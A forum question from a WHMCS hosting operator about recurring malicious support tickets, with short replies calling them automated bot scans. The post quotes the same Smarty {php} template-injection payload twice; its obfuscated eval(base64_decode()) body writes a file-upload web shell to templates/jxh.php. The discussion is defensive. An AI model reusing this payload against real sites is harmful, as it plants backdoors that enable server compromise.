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: Should WHMCS hacking attemps that never succeed be important to me? I have WHMCS and I use it with no problem for my hosting purposes. Almost every 2 or 3 days, I can see a spam with malicious


Posted in: #Hacking #Php #Security #Server

I have WHMCS and I use it with no problem for my hosting purposes.

Almost every 2 or 3 days, I can see a spam with malicious content submitted as a new ticket that tries to hack.

The last one was:


{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ qMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVnd iRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZM mh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDB pWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFh Cc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2I yRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJ KMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p 5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzY jJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUg wTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzL 2p4aC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTt=')) ;{/php})


{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ qMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVnd iRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZM mh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDB pWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFh Cc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2I yRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJ KMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p 5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzY jJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUg wTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzL 2p4aC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTt=')) ;{/php})

What are these attacks? Why don't they use any other way to attack?!!!

In my opinion it is obvious that a system like WHMCS will never be hacked by such a poor attempts. They should have of course used some functions like strip_tags and mysql_real_escape_string and other security functions.

Would any body explain why do they always select such a poor way to attack? Don't they really know that WHMCS is stronger than these low level hacks?

In fact I'd like to know that: Do these efforts differ from each other? Can they be serious? Should I be scared of these attempts?

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In case you're curious, here's the source (or a copy of it) to the attacker's method: This may help also:
As for being worried? If you are sure you follow the orthodox server security protocols, and you actively check for and fix any holes, then you should be fine. I recommend you keep a log of all of the IP addresses sending this code, and then maybe call their ISP (can be determined from

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It's a robot scanning the web for WHMCS installs that are vulnerable to this attack, it's just part and parcel of running a website.

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